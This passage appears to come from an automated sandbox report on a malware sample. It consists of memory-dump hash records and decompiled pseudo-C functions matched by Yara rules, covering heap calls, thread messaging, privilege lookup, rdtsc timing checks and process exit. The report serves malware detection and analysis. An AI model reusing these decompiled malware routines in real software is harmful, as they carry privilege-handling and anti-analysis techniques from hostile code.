                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 04D01776200214ABD710EBD9CC85EE77BACEF48764F154499BA189B242C530FA1086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00409AB0(void* __esi, intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				char _v24;
                                      				char _v284;
                                      				char _v804;
                                      				char _v840;
                                      				void* _t25;
                                      				void* _t32;
                                      				void* _t34;
                                      				void* _t35;
                                      				intOrPtr* _t37;
                                      				void* _t39;
                                      				void* _t51;
                                      				intOrPtr* _t54;
                                      				void* _t57;
                                      				void* _t58;
                                      				void* _t59;
                                      				void* _t60;
                                      
                                      				_t54 = _a4;
                                      				_t39 = 0; // executed
                                      				_t25 = E00407EA0(_t54,  &_v24); // executed
                                      				_t58 = _t57 + 8;
                                      				if(_t25 != 0) {
                                      					E004080B0( &_v24,  &_v840);
                                      					_t59 = _t58 + 8;
                                      					do {
                                      						E0041BE20( &_v284, 0x104);
                                      						E0041C490( &_v284,  &_v804);
                                      						_t60 = _t59 + 0x10;
                                      						_t51 = 0x4f;
                                      						while(1) {
                                      							_t32 = E00414DF0(E00414D90(_t54, _t51),  &_v284);
                                      							_t60 = _t60 + 0x10;
                                      							if(_t32 != 0) {
                                      								break;
                                      							}
                                      							_t51 = _t51 + 1;
                                      							if(_t51 <= 0x62) {
                                      								continue;
                                      							} else {
                                      							}
                                      							goto L8;
                                      						}
                                      						_t9 = _t54 + 0x14; // 0xffffe045
                                      						 *(_t54 + 0x474) =  *(_t54 + 0x474) ^  *_t9;
                                      						_t39 = 1;
                                      						L8:
                                      						_t34 = E004080E0( &_v24,  &_v840);
                                      						_t59 = _t60 + 8;
                                      					} while (_t34 != 0 && _t39 == 0);
                                      					_t35 = E00408160(_t54,  &_v24); // executed
                                      					if(_t39 == 0) {
                                      						asm("rdtsc");
                                      						asm("rdtsc");
                                      						_v8 = _t35 - 0 + _t35;
                                      						 *((intOrPtr*)(_t54 + 0x55c)) =  *((intOrPtr*)(_t54 + 0x55c)) + 0xffffffba;
                                      					}
                                      					 *((intOrPtr*)(_t54 + 0x31)) =  *((intOrPtr*)(_t54 + 0x31)) + _t39;
                                      					_t20 = _t54 + 0x31; // 0x5608758b
                                      					_t37 =  *_t20 + 1;
                                      					 *((intOrPtr*)(_t54 + 0x32)) =  *((intOrPtr*)(_t54 + 0x32)) + _t37;
                                      					 *_t37 =  *_t37 + _t37;
                                      					 *_t37 =  *_t37 + _t37;
                                      					return _t37;
                                      				} else {
                                      					return _t25;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35edeeba2bef4320ebd4bc3e8f44ee34bd1951791ea40148356b6ba52d6809c2
                                      • Instruction ID: 77e9a7fcf311a02884027d7eed629e63789b86f5f64cf2d4000c21f50c1f320a
                                      • Opcode Fuzzy Hash: 35edeeba2bef4320ebd4bc3e8f44ee34bd1951791ea40148356b6ba52d6809c2
                                      • Instruction Fuzzy Hash: B5210AB2D4021857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A640(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                      				void* _t10;
                                      				void* _t15;
                                      
                                      				E0041AF70(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                      				_t6 =  &_a8; // 0x414536
                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A66D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 6EA
                                      • API String ID: 1279760036-1400015478
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 592b11653d41df1d8c7fc10f01e82977d3d632a9db32d8feb401f664a84ee6f2
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: 34E012B5200208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F9118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E0040830A(void* __edx, intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t13;
                                      				int _t14;
                                      				void* _t17;
                                      				long _t24;
                                      				int _t29;
                                      				void* _t32;
                                      				void* _t34;
                                      				signed int _t39;
                                      
                                      				_t39 =  *(__edx - 0x87bdeb2) * 0x83ec8b55;
                                      				_t32 = _t34;
                                      				_v68 = 0;
                                      				E0041BE70( &_v67, 0, 0x3f);
                                      				E0041CA10( &_v68, 3);
                                      				_t13 = E0040ACF0(_t17, _t39, _a4 + 0x1c,  &_v68); // executed
                                      				_t14 = E00414E50(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
                                      				_t29 = _t14;
                                      				if(_t29 != 0) {
                                      					_t24 = _a8;
                                      					_t14 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                      					_t41 = _t14;
                                      					if(_t14 == 0) {
                                      						_t14 =  *_t29(_t24, 0x8003, _t32 + (E0040A480(_t41, 1, 8) & 0x000000ff) - 0x40, _t14);
                                      					}
                                      				}
                                      				return _t14;
                                      			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: d8016f69f7fdacbf48aee5998f05ea0b4b9582e1441f7f5e5e5c09c151f97d8c
                                      • Instruction ID: 533a4eaa06a887a2dc8aa4e8c29d9caca5befe611f8153f0c6e8590f3ba2924b
                                      • Opcode Fuzzy Hash: d8016f69f7fdacbf48aee5998f05ea0b4b9582e1441f7f5e5e5c09c151f97d8c
                                      • Instruction Fuzzy Hash: 6301D831A803197AE72096909D43FFE772CAF40F55F05011EFF04BA1C1D6B8290646E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00408310(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t12;
                                      				intOrPtr* _t13;
                                      				int _t14;
                                      				long _t22;
                                      				intOrPtr* _t26;
                                      				void* _t27;
                                      				void* _t31;
                                      
                                      				_t31 = __eflags;
                                      				_v68 = 0;
                                      				E0041BE70( &_v67, 0, 0x3f);
                                      				E0041CA10( &_v68, 3);
                                      				_t12 = E0040ACF0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
                                      				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                      				_t26 = _t13;
                                      				if(_t26 != 0) {
                                      					_t22 = _a8;
                                      					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                      					_t33 = _t14;
                                      					if(_t14 == 0) {
                                      						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                      					}
                                      					return _t14;
                                      				}
                                      				return _t13;
                                      			}

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 77038d2a077275aef7ed545b971b35c8e1c538d4b0b8cb05213e3f7100835d61
                                      • Instruction ID: 53dc64e71fce87e5f75c3499843572948f8972334720c735b998f786ef145ab9
                                      • Opcode Fuzzy Hash: 77038d2a077275aef7ed545b971b35c8e1c538d4b0b8cb05213e3f7100835d61
                                      • Instruction Fuzzy Hash: 99018431A8032876E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E0041A7D1(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                      				intOrPtr _v0;
                                      				int _t17;
                                      
                                      				 *(__edx + 0x59) =  *(__edx + 0x59) & __ecx;
                                      				_push(_t31);
                                      				_t14 = _v0;
                                      				_push(__esi);
                                      				E0041AF70(__esi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t14 + 0xa18)), 0, 0x46);
                                      				_t17 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                      				return _t17;
                                      			}

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A810
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: b82fbc32528422d322db90487616afc04f74b7645e5cdc6ba9f189362086d509
                                      • Instruction ID: 38a3c565679ac4ea61352532d13f186337fc4247d0c74adff2d3d09fe7a0c6b8
                                      • Opcode Fuzzy Hash: b82fbc32528422d322db90487616afc04f74b7645e5cdc6ba9f189362086d509
                                      • Instruction Fuzzy Hash: 91F0A0B13002146FCB14DF48CC84EEB7B6AEF88350F148099F9089B282D630E911CBF4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E0041A672(void* __esi, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
                                      				char _t14;
                                      				void* _t21;
                                      				void* _t28;
                                      
                                      				 *((intOrPtr*)(_t28 + __esi + 0x2adc4db7)) =  *((intOrPtr*)(_t28 + __esi + 0x2adc4db7)) - 0xec8b557f;
                                      				_t11 = _a8;
                                      				_push(__esi);
                                      				_t7 = _t11 + 0xc74; // 0xc74
                                      				E0041AF70(_t21, _a8, _t7,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
                                      				_t14 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                      				return _t14;
                                      			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A6AD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 36a6af0483d1d9e9458feb69eb230d8f8eae13fd8772017dfe98303588db4a34
                                      • Instruction ID: a0b378a72166d7f59972a2a0f8d0dd21d1399013392d8530069e8b3b4f753501
                                      • Opcode Fuzzy Hash: 36a6af0483d1d9e9458feb69eb230d8f8eae13fd8772017dfe98303588db4a34
                                      • Instruction Fuzzy Hash: 38E092B56002046BCB18EFA5DD48EE73769EF84764F04455DFD095B251C630E910CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A680(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                      				char _t10;
                                      				void* _t15;
                                      
                                      				_t3 = _a4 + 0xc74; // 0xc74
                                      				E0041AF70(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A6AD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: fcee721cd7445a9ad64dbfb52f2376cb99f5489ae25ce6a6cb2d596bcbca8a62
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: 9FE046B5200208ABDB18EF99CC49EE777ACEF88764F018559FE085B252C630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A7E0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				int _t10;
                                      				void* _t15;
                                      
                                      				E0041AF70(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A810
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 4cc14ee37cd2f32fa95828879ac0b08b043e064e13a113528ab89dd0e06593dc
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 13E01AB52002086BDB10DF89CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A6C0(intOrPtr _a4, int _a8) {
                                      				void* _t10;
                                      
                                      				_t5 = _a4;
                                      				E0041AF70(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                      				ExitProcess(_a8);
                                      			}

                                      APIs
                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6E8
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: 75e1117333c9134f007ad6fb0bd9798cfc2fba1270219ae5a24e5558ca513934
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: FCD017766002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E0041A6B3() {
                                      				void* _t7;
                                      				intOrPtr _t11;
                                      				signed int _t17;
                                      				void* _t21;
